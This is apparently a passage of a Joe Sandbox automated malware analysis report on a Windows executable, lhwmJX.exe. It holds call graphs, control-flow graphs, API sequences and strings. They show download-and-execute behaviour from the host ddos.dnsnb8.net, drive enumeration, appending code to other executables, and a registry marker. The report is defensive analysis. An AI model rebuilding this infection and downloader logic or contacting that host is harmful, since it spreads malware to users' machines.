1216->1217 1218 bc231f CloseHandle 1217->1218 1218->1181 1220 bc2451 CreateFileA GetFileSize 1219->1220 1228 bc23d8 1219->1228 1221 bc2675 CloseHandle 1220->1221 1222 bc2480 1220->1222 1223 bc267c RemoveDirectoryA 1221->1223 1222->1221 1224 bc2499 1222->1224 1225 bc2687 1223->1225 1226 bc1915 3 API calls 1224->1226 1225->1159 1227 bc24a4 9 API calls 1226->1227 1276 bc189d memset CreateProcessA 1227->1276 1228->1220 1228->1225 1231 bc255c Sleep memset wsprintfA 1232 bc29e2 163 API calls 1231->1232 1233 bc2597 memset wsprintfA Sleep 1232->1233 1234 bc189d 6 API calls 1233->1234 1235 bc25e4 Sleep CreateFileA 1234->1235 1236 bc1915 3 API calls 1235->1236 1237 bc2610 CloseHandle 1236->1237 1237->1223 1238 bc261e 1237->1238 1238->1223 1239 bc2641 SetFilePointer WriteFile 1238->1239 1239->1223 1240 bc2667 SetEndOfFile 1239->1240 1240->1223 1242 bc26b2 WaitForSingleObject 1241->1242 1243 bc26a2 CreateEventA 1241->1243 1244 bc2708 1242->1244 1245 bc26c1 lstrlen ??2@YAPAXI 1242->1245 1243->1242 1247 bc2736 SetEvent 1244->1247 1249 bc2718 lstrcpy ??3@YAXPAX 1244->1249 1246 bc26da lstrcpy 1245->1246 1245->1247 1248 bc26f1 1246->1248 1247->1159 1248->1247 1249->1248 1251 bc1e62 1250->1251 1252 bc1e13 lstrcpy strrchr 1250->1252 1251->1180 1251->1181 1252->1251 1253 bc1e40 lstrcmpiA 1252->1253 1253->1251 1254 bc1e52 lstrlen 1253->1254 1254->1251 1254->1253 1256 bc1928 1255->1256 1260 bc1924 SetFilePointer CreateFileMappingA MapViewOfFile 1255->1260 1257 bc192e memset GetFileTime 1256->1257 1258 bc194f 1256->1258 1257->1260 1259 bc1954 SetFileTime 1258->1259 1258->1260 1259->1260 1260->1181 1260->1191 1262 bc1c9c 1261->1262 1264 bc1c94 1261->1264 1263 bc1cae memset memset 1262->1263 1262->1264 1263->1264 1264->1181 1265 bc185b GetSystemTimeAsFileTime srand rand srand rand 1264->1265 1265->1195 1270 bc1b93 1266->1270 1268 bc1bca srand 1269 bc1bd8 rand 1268->1269 1271 bc1c08 1269->1271 1275 bc185b GetSystemTimeAsFileTime srand rand srand rand 1270->1275 1271->1269 1272 bc1c29 memset memcpy lstrcat 1271->1272 1272->1214 1274->1216 1275->1268 1277 bc190c 1276->1277 1278 bc18e0 CloseHandle WaitForSingleObject 1276->1278 1277->1223 1277->1231 1279 bc18fb GetExitCodeProcess 1278->1279 1280 bc1907 CloseHandle 1278->1280 1279->1280 1280->1277 1290 bc185b GetSystemTimeAsFileTime srand rand srand rand 1281->1290 1283 bc27b5 wsprintfA CopyFileA 1284 bc27de wsprintfA 1283->1284 1285 bc2840 1283->1285 1286 bc1973 17 API calls 1284->1286 1285->1137 1287 bc280f 1286->1287 1288 bc2820 CreateFileA 1287->1288 1289 bc2813 DeleteFileA 1287->1289 1288->1285 1289->1288 1290->1283 1292 bc11c6 AdjustTokenPrivileges 1291->1292 1293 bc1200 CloseHandle 1291->1293 1294 bc11f6 1292->1294 1295 bc11f7 CloseHandle 1292->1295 1293->1078 1294->1295 1295->1293 1297 bc123f GetCurrentProcessId OpenProcess 1296->1297 1298 bc1310 1296->1298 1297->1298 1300 bc1262 1297->1300 1298->1076 1305 bc1319 1298->1305 1299 bc12b0 VirtualAlloc 1299->1300 1303 bc12b8 1299->1303 1300->1299 1301 bc12f1 CloseHandle 1300->1301 1300->1303 1304 bc1296 VirtualFree 1300->1304 1301->1298 1302 bc1302 VirtualFree 1301->1302 1302->1298 1303->1301 1304->1299 1306 bc134a 1305->1306 1307 bc132a GetModuleHandleA GetProcAddress 1305->1307 1308 bc1351 memset 1306->1308 1309 bc1363 1306->1309 1307->1306 1307->1309 1308->1309 1309->1076 1309->1084 1310->1097 1312 bc1196 1311->1312 1313 bc10ba 1311->1313 1313->1312 1329 bc185b GetSystemTimeAsFileTime srand rand srand rand 1313->1329 1315 bc1118 wsprintfA wsprintfA URLDownloadToFileA 1316 bc10dc 1315->1316 1317 bc1168 lstrlen Sleep 1315->1317 1320 bc1000 CreateFileA 1316->1320 1317->1313 1321 bc1025 GetFileSize CreateFileMappingA MapViewOfFile 1320->1321 1322 bc1092 WinExec lstrlen 1320->1322 1323 bc107b 1321->1323 1324 bc1057 1321->1324 1322->1312 1322->1313 1325 bc108d CloseHandle 1323->1325 1326 bc1087 CloseHandle 1323->1326 1327 bc1074 UnmapViewOfFile 1324->1327 1328 bc1061 1324->1328 1325->1322 1326->1325 1327->1323 1328->1327 1329->1315 1348 bc2361 1349 bc236b UnmapViewOfFile 1348->1349 1350 bc2374 1348->1350 1349->1350 1351 bc2379 CloseHandle 1350->1351 1352 bc2382 1350->1352 1351->1352 1353 bc2388 CloseHandle 1352->1353 1354 bc2391 1352->1354 1353->1354

                                Callgraph

                                • Executed
                                • Not Executed
                                • Opacity -> Relevance
                                • Disassembly available
                                callgraph 0 Function_00BC28B8 7 Function_00BC239D 0->7 17 Function_00BC2692 0->17 40 Function_00BC1E6E 0->40 45 Function_00BC29E2 0->45 1 Function_00BC1638 10 Function_00BC139F 1->10 11 Function_00BC1718 1->11 12 Function_00BC1099 1->12 30 Function_00BC1581 1->30 50 Function_00BC17D0 1->50 51 Function_00BC2C48 1->51 2 Function_00BC6834 3 Function_00BC6734 25 Function_00BC6A84 3->25 27 Function_00BC6D00 3->27 31 Function_00BC6B02 3->31 4 Function_00BC69B0 5 Function_00BC67A4 6 Function_00BC65A6 8 Function_00BC189D 7->8 16 Function_00BC1915 7->16 7->45 9 Function_00BC119F 10->9 13 Function_00BC1319 10->13 20 Function_00BC120E 10->20 37 Function_00BC2CF0 11->37 26 Function_00BC1000 12->26 49 Function_00BC185B 12->49 14 Function_00BC2D9B 15 Function_00BC6014 18 Function_00BC6012 19 Function_00BC2B8C 32 Function_00BC2B7D 19->32 54 Function_00BC2845 19->54 21 Function_00BC680F 22 Function_00BC1D8A 23 Function_00BC1B8A 23->49 24 Function_00BC600A 25->21 38 Function_00BC6CF2 25->38 26->50 27->4 27->38 46 Function_00BC6B63 27->46 28 Function_00BC6001 28->24 29 Function_00BC1C81 30->49 31->46 32->45 33 Function_00BC6CF8 34 Function_00BC1AF9 34->1 35 Function_00BC6076 52 Function_00BC66C8 35->52 36 Function_00BC1DF6 38->33 39 Function_00BC1973 39->49 40->14 40->16 40->22 40->23 40->29 40->34 40->36 41 Function_00BC1C68 40->41 42 Function_00BC2D60 40->42 40->49 43 Function_00BC14E1 43->1 43->34 44 Function_00BC2361 44->14 45->0 46->2 46->4 46->5 47 Function_00BC235D 48 Function_00BC6159 48->52 51->19 51->39 52->25 52->27 52->31 53 Function_00BC274A 53->39 53->49 54->7 54->17 54->53

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                • String ID: %s*$C:\$Documents and Settings
                                • API String ID: 2826467728-110786608
                                • Opcode ID: d888433a0dd25faae487f44976029922d2dd7b4854ceed95c1e11bd366918156
                                • Instruction ID: fb132bad0913894936533bc7f7a46aa85185bc0fa7140d288752007fa47b7fd0
                                • Opcode Fuzzy Hash: d888433a0dd25faae487f44976029922d2dd7b4854ceed95c1e11bd366918156
                                • Instruction Fuzzy Hash: 344130B3404349AFD721DBA0DC89EDB77ECEB88715F04486DF945D3111EA35DA4887A2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 172 bc1099-bc10b4 173 bc1199-bc119c 172->173 174 bc10ba-bc10c7 172->174 175 bc10c8-bc10d4 174->175 176 bc10da 175->176 177 bc1184-bc1190 175->177 178 bc1113-bc1162 call bc185b wsprintfA * 2 URLDownloadToFileA 176->178 177->175 179 bc1196-bc1198 177->179 182 bc10dc-bc110d call bc1000 WinExec lstrlen 178->182 183 bc1168-bc1182 lstrlen Sleep 178->183 179->173 182->178 182->179 183->177 183->178
                                APIs
                                  • Part of subcall function 00BC185B: GetSystemTimeAsFileTime.KERNEL32(00BC1F92,00000000,?,00000000,?,?,?,00BC1F92,?,00000000,00000002), ref: 00BC1867
                                  • Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1878
                                  • Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1880
                                  • Part of subcall function 00BC185B: srand.MSVCRT ref: 00BC1890
                                  • Part of subcall function 00BC185B: rand.MSVCRT ref: 00BC1894
                                • WinExec.KERNEL32(?,00000005), ref: 00BC10F1
                                • lstrlen.KERNEL32(00BC4748), ref: 00BC10FA
                                • wsprintfA.USER32 ref: 00BC112A
                                • wsprintfA.USER32 ref: 00BC1143
                                • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00BC115B
                                • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00BC1169
                                • Sleep.KERNEL32 ref: 00BC1179
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                • String ID: %s%.8X.exe$C:\Users\user~1\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                • API String ID: 1280626985-4120842960
                                • Opcode ID: 3f7c0b8390a3ca783807c8059a60885b2422cbbfd1b1005a8864199976c387ff
                                • Instruction ID: 0c6e6267c391cba2905c15d3e4d8b2299985dd00c1a82e6630190015b41f9ca9
                                • Opcode Fuzzy Hash: 3f7c0b8390a3ca783807c8059a60885b2422cbbfd1b1005a8864199976c387ff
                                • Instruction Fuzzy Hash: 60216B76900248BFDB209BA4DC58FAEBBF8EB0A715F5584D9E500B3051DB749B848F60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 216 bc1718-bc1733 GetSystemTimeAsFileTime 217 bc1754-bc1758 216->217 218 bc1735-bc1752 SHSetValueA 216->218 219 bc17c6-bc17cd 217->219 220 bc175a-bc1784 SHGetValueA 217->220 218->219 220->219 221 bc1786-bc17b3 call bc2cf0 * 2 220->221 221->219 226 bc17b5 221->226 227 bc17bf 226->227 228 bc17b7-bc17bd 226->228 227->219 228->219 228->227
                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe), ref: 00BC1729
                                • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00BC174C
                                • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00BC177C
                                • __aulldiv.LIBCMT ref: 00BC1796
                                • __aulldiv.LIBCMT ref: 00BC17A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: TimeValue__aulldiv$FileSystem
                                • String ID: C:\Users\user~1\AppData\Local\Temp\lhwmJX.exe$SOFTWARE\GTplus$Time
                                • API String ID: 541852442-599966548
                                • Opcode ID: f630e8052ac2441b494d25c9e3cd6fa00a056d462aff203c913f37a7676324c1
                                • Instruction ID: 3df50767389ab3f92fae3075c2d5b8493f817f4f726211983edb70a53736ee71
                                • Opcode Fuzzy Hash: f630e8052ac2441b494d25c9e3cd6fa00a056d462aff203c913f37a7676324c1
                                • Instruction Fuzzy Hash: 541163B2A00209BBDB109B94CC85FEF7BFCEB45B54F508559F900F6141D6719E458B60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 229 bc6076-bc6079 230 bc607b-bc6080 229->230 231 bc60e0-bc60eb 229->231 233 bc60f7-bc60f8 230->233 234 bc6082-bc6085 230->234 232 bc60ee-bc60f4 231->232 235 bc60f6 232->235 236 bc60fe-bc6106 233->236 237 bc60fa-bc60fc call bc66c8 233->237 234->235 238 bc6087 234->238 235->233 240 bc6108-bc611d 236->240 241 bc6155-bc6189 VirtualFree 236->241 237->236 238->232 242 bc6089-bc6095 238->242 244 bc611f-bc6121 240->244 247 bc618c-bc6192 241->247 245 bc6097-bc609f 242->245 246 bc60a1-bc60aa 242->246 248 bc6151-bc6154 244->248 249 bc6123 244->249 245->246 250 bc61ba-bc61c8 246->250 251 bc60b0-bc60c1 VirtualAlloc 246->251 252 bc6198-bc61b0 VirtualFree 247->252 253 bc60c7-bc60cf 247->253 248->241 249->248 256 bc6125-bc6128 249->256 254 bc61ca-bc61d7 250->254 255 bc6243-bc6251 250->255 251->253 252->250 260 bc61b2-bc61b4 252->260 253->247 257 bc60d5-bc60df VirtualAlloc 253->257 261 bc61dd-bc61e0 254->261 258 bc6264-bc626f 255->258 259 bc6253 255->259 262 bc612a-bc612e 256->262 263 bc6134-bc613b 256->263 257->231 266 bc6271-bc6276 258->266 265 bc6255-bc6258 259->265 260->250 261->255 267 bc61e2-bc61f2 261->267 262->263 270 bc6130-bc6132 262->270 269 bc613d-bc614f 263->269 263->270 265->258 271 bc625a-bc6262 265->271 272 bc627c-bc6289 266->272 273 bc6389-bc63b1 VirtualProtect 266->273 274 bc61f5-bc61fe 267->274 269->244 270->244 271->265 287 bc628b 272->287 288 bc6292-bc6298 272->288 275 bc63b7-bc63ba 273->275 276 bc620c-bc6219 274->276 277 bc6200-bc6203 274->277 279 bc63fc-bc63ff VirtualProtect 275->279 280 bc63bc-bc63c2 275->280 278 bc6238-bc623f 276->278 282 bc621b-bc6228 277->282 283 bc6205-bc6208 277->283 278->274 285 bc6241 278->285 286 bc6400-bc6416 279->286 280->280 284 bc63c4 280->284 282->278 289 bc622a-bc6236 283->289 290 bc620a 283->290 284->279 294 bc63c6-bc63cf 284->294 285->261 292 bc6418-bc641d 286->292 293 bc6420-bc6425 286->293 287->288 291 bc62a2-bc62ac 288->291 289->278 290->278 295 bc62ae 291->295 296 bc62b1-bc62c8 291->296 297 bc63d4-bc63d8 294->297 298 bc63d1 294->298 295->296 299 bc62ce-bc62d4 296->299 300 bc6373-bc6384 296->300 301 bc63dd-bc63e1 297->301 302 bc63da 297->302 298->297 303 bc62da-bc62f1 299->303 304 bc62d6-bc62d9 299->304 300->266 305 bc63e7-bc63fa VirtualProtect 301->305 306 bc63e3 301->306 302->301 308 bc6365-bc636e 303->308 309 bc62f3-bc62f9 303->309 304->303 305->275 305->279 306->305 308->291 310 bc62fb-bc630f 309->310 311 bc6314-bc6326 309->311 312 bc6426-bc64a9 310->312 313 bc634c-bc6360 311->313 314 bc6328-bc634a 311->314 323 bc6519-bc651c 312->323 324 bc64ab-bc64c0 312->324 313->312 314->308 325 bc651d-bc651e 323->325 326 bc6583-bc6587 323->326 328 bc6535-bc6537 324->328 329 bc64c2 324->329 331 bc6522-bc6533 325->331 330 bc6588-bc658b 326->330 332 bc6539 328->332 333 bc659a 328->333 334 bc64f8 329->334 335 bc64c5-bc64cd 329->335 336 bc658d-bc658f 330->336 337 bc65a1-bc65a3 330->337 331->328 338 bc653b-bc6541 332->338 339 bc65b4 332->339 340 bc659b-bc659d 333->340 343 bc656c-bc656f 334->343 344 bc64fa-bc64fe 334->344 341 bc64cf-bc64d4 335->341 342 bc6542-bc6545 335->342 345 bc6591-bc6593 336->345 338->342 351 bc65be-bc6608 339->351 340->345 347 bc659f 340->347 348 bc64d6-bc64d9 341->348 349 bc6517-bc6518 341->349 350 bc654d-bc6550 342->350 352 bc6572 343->352 344->352 353 bc6500 344->353 345->340 346 bc6595 345->346 346->333 347->330 348->350 354 bc64db-bc64f5 348->354 349->323 350->351 355 bc6552-bc6556 350->355 357 bc6573-bc6576 352->357 353->331 358 bc6502 353->358 354->334 359 bc6578-bc657f 355->359 360 bc6558-bc6569 355->360 357->359 358->357 361 bc6504-bc6513 358->361 359->326 360->343 361->328 363 bc6515 361->363 363->349
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00BC60BE
                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00BC60DF
                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00BC6189
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00BC61A5
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 87e85f70df4a6cb74df87e3d6aa3945753eaa98a6f864b70057e537295339769
                                • Instruction ID: 05dc4094916bf6706fa51509d8213fc8ca89b97d6df66d210b87324214132e49
                                • Opcode Fuzzy Hash: 87e85f70df4a6cb74df87e3d6aa3945753eaa98a6f864b70057e537295339769
                                • Instruction Fuzzy Hash: 6C1233B25087898FDB328F64CC85FEA7BF4EF12310F1845EED8859B292D674A901C765

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 365 bc2b8c-bc2bc6 memset GetLogicalDriveStringsA 366 bc2bc8-bc2bcc 365->366 367 bc2c09-bc2c28 WaitForMultipleObjects 365->367 370 bc2bce-bc2bd0 366->370 371 bc2bfa-bc2c07 lstrlen 366->371 368 bc2c3c-bc2c45 367->368 369 bc2c2a-bc2c3a CreateThread 367->369 369->368 370->371 372 bc2bd2-bc2bdc GetDriveTypeA 370->372 371->366 371->367 372->371 373 bc2bde-bc2be1 372->373 373->371 374 bc2be3-bc2bf6 CreateThread 373->374 374->371
                                APIs
                                • memset.MSVCRT ref: 00BC2BA6
                                • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00BC2BB4
                                • GetDriveTypeA.KERNEL32(?), ref: 00BC2BD3
                                • CreateThread.KERNEL32(00000000,00000000,00BC2B7D,?,00000000,00000000), ref: 00BC2BEE
                                • lstrlen.KERNEL32(?), ref: 00BC2BFB
                                • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00BC2C16
                                • CreateThread.KERNEL32(00000000,00000000,00BC2845,00000000,00000000,00000000), ref: 00BC2C3A
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                • String ID:
                                • API String ID: 1073171358-0
                                • Opcode ID: 0b923c25c796da2af4fd5547b29501488205831634a0d5d94268414d58b45474
                                • Instruction ID: 091a0a2ffddc42c603e62a17c45954a44c2685b73b2d24f8768fa6585ef5adad
                                • Opcode Fuzzy Hash: 0b923c25c796da2af4fd5547b29501488205831634a0d5d94268414d58b45474
                                • Instruction Fuzzy Hash: 5D21C0B280014DAFEB20AF64AC84FAF7BEDFB08745B550529F842D3161DB308E06CB60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 16 bc1e6e-bc1e95 call bc2d60 19 bc1e9c-bc1eaa call bc1df6 16->19 20 bc1e97 call bc1d8a 16->20 24 bc1eb0-bc1ed9 SetFileAttributesA CreateFileA 19->24 25 bc2332 19->25 20->19 24->25 26 bc1edf-bc1f28 call bc1915 SetFilePointer CreateFileMappingA MapViewOfFile 24->26 27 bc2338-bc233b 25->27 26->25 34 bc1f2e-bc1f39 26->34 29 bc233d-bc2340 UnmapViewOfFile 27->29 30 bc2346-bc2349 27->30 29->30 32 bc234b-bc234e CloseHandle 30->32 33 bc2350-bc2354 30->33 32->33 35 bc2356-bc235b CloseHandle 33->35 36 bc2391-bc239a call bc2d9b 33->36 34->25 38 bc1f3f-bc1f56 34->38 35->36 38->25 40 bc1f5c-bc1f64 38->40 40->25 41 bc1f6a-bc1f70 40->41 41->25 42 bc1f76-bc1f87 call bc1c81 41->42 42->25 45 bc1f8d-bc1fa7 call bc185b call bc1c81 42->45 45->25 50 bc1fad-bc1fb4 45->50 51 bc2024-bc2045 50->51 52 bc1fb6-bc1fc5 call bc1af9 50->52 51->25 53 bc204b-bc204e 51->53 52->51 60 bc1fc7-bc1fd2 52->60 55 bc2070-bc20f4 call bc1af9 * 2 call bc1c68 * 2 memset * 2 53->55 56 bc2050-bc2053 53->56 78 bc20f5-bc20fe 55->78 58 bc2056-bc205a 56->58 58->55 61 bc205c-bc2061 58->61 60->25 63 bc1fd8-bc1fe7 60->63 61->25 64 bc2067-bc206e 61->64 66 bc1fef-bc2006 call bc1af9 63->66 67 bc1fe9-bc1fec 63->67 64->58 72 bc2008-bc200e call bc1c68 66->72 73 bc2013-bc201e FlushViewOfFile 66->73 67->66 72->73 73->51 79 bc2130-bc2139 78->79 80 bc2100-bc2114 78->80 83 bc213c-bc2142 79->83 81 bc212d-bc212e 80->81 82 bc2116-bc212a 80->82 81->78 82->81 84 bc215c 83->84 85 bc2144-bc2150 83->85 88 bc215f-bc2162 84->88 86 bc2157-bc215a 85->86 87 bc2152-bc2154 85->87 86->83 87->86 89 bc2164-bc2171 88->89 90 bc2181-bc2184 88->90 93 bc232a-bc232d 89->93 94 bc2177-bc217e 89->94 91 bc218d-bc21ba call bc1c68 90->91 92 bc2186 90->92 97 bc21bc-bc21d0 call bc1c68 91->97 98 bc21d3-bc220b call bc1c81 call bc1c68 91->98 92->91 93->88 94->90 97->98 105 bc220d-bc2218 call bc1c68 98->105 106 bc221b-bc221e 98->106 105->106 107 bc2226-bc2328 memcpy UnmapViewOfFile CloseHandle call bc1b8a call bc185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call bc1915 CloseHandle 106->107 108 bc2220-bc2223 106->108 107->27 108->107
                                APIs
                                • SetFileAttributesA.KERNEL32(?,00000080,?,00BC32B0,00000164,00BC2986,?), ref: 00BC1EB9
                                • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00BC1ECD
                                • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00BC1EF3
                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00BC1F07
                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00BC1F1D
                                • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00BC201E
                                • memset.MSVCRT ref: 00BC20D8
                                • memset.MSVCRT ref: 00BC20EA
                                • memcpy.MSVCRT(?,?,00000028,?,?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC222D
                                • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC2238
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC224A
                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC22C6
                                • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC22CB
                                • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC22DD
                                • WriteFile.KERNEL32(000000FF,00BC4008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC22F7
                                • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC230D
                                • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00BC2322
                                • UnmapViewOfFile.KERNEL32(?,?,00BC32B0,00000164,00BC2986,?), ref: 00BC2340
                                • CloseHandle.KERNEL32(?,?,00BC32B0,00000164,00BC2986,?), ref: 00BC234E
                                • CloseHandle.KERNEL32(000000FF,?,00BC32B0,00000164,00BC2986,?), ref: 00BC2359
                                Memory Dump Source
                                • Source File: 00000002.00000002.1584510553.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                • Associated: 00000002.00000002.1584495298.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584527478.0000000000BC3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584552615.0000000000BC4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                • Associated: 00000002.00000002.1584567002.0000000000BC6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_bc0000_lhwmJX.jbxd
                                Similarity
                                • API ID: File$CloseHandleView$Pointer$CreateUnmapWritememset$AttributesFlushMappingmemcpy
                                • String ID:
                                • API String ID: 3043204753-0
                                • Opcode ID: 5b9ce0d6354b877828f0c7e41e10c30be18f5d2d1e33431fa56a4253a0afea17
                                • Instruction ID: 04a200668e9ed95eae3dda46ff72a1e76800a68af671b8ea5fff98c5ffbea7f0
                                • Opcode Fuzzy Hash: 5b9ce0d6354b877828f0c7e41e10c30be18f5d2d1e33431fa56a4253a0afea17
                                • Instruction Fuzzy Hash: EEF12871900209AFDB20DFA8D881EADBBF5FF08314F10856EE51AA7661DB30AE51CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 117 bc1973-bc199a PathFileExistsA 118 bc1ac7-bc1acc 117->118 119 bc19a0-bc19aa 117->119 120 bc1ace 118->120 121 bc1ad0-bc1ad5 118->121 122 bc19af-bc19c2 CreateFileA 119->122 120->121 125 bc1ad7-bc1ad9 121->125 126 bc1af0-bc1af6 121->126 123 bc1a28-bc1a36 GetFileSize 122->123 124 bc19c4-bc19d3 Sleep 122->124 128 bc1a38-bc1a3b 123->128 129 bc1a87-bc1a8b 123->129 124->122 127 bc19d5-bc1a0b call bc185b wsprintfA CopyFileA 124->127 125->126 127->123 141 bc1a0d-bc1a26 CreateFileA 127->141 128->129 131 bc1a3d-bc1a51 VirtualAlloc 128->131 132 bc1a8d-bc1a90 CloseHandle 129->132 133 bc1a96-bc1a9a 129->133 131->129 135 bc1a53-bc1a57 131->135 132->133 136 bc1a9c 133->136 137 bc1aad-bc1ab1 133->137 142 bc1a59-bc1a6d ReadFile 135->142 143 bc1a80 135->143 138 bc1aa0-bc1aa7 DeleteFileA 136->138 139 bc1adb-bc1ae0 137->139 140 bc1ab3-bc1ab6 137->140 138->137 146 bc1ae7-bc1aec 139->146 147 bc1ae2-bc1ae5 139->147 140->118 144 bc1ab8-bc1ac1 VirtualFree 140->144 141->123 145 bc1a9e 141->145 142->129 148 bc1a6f-bc1a7e 142->148 143->129 144->118 145->138 146->126 149 bc1aee 146->149 147->146 148->142 148->143 149->126
                                APIs
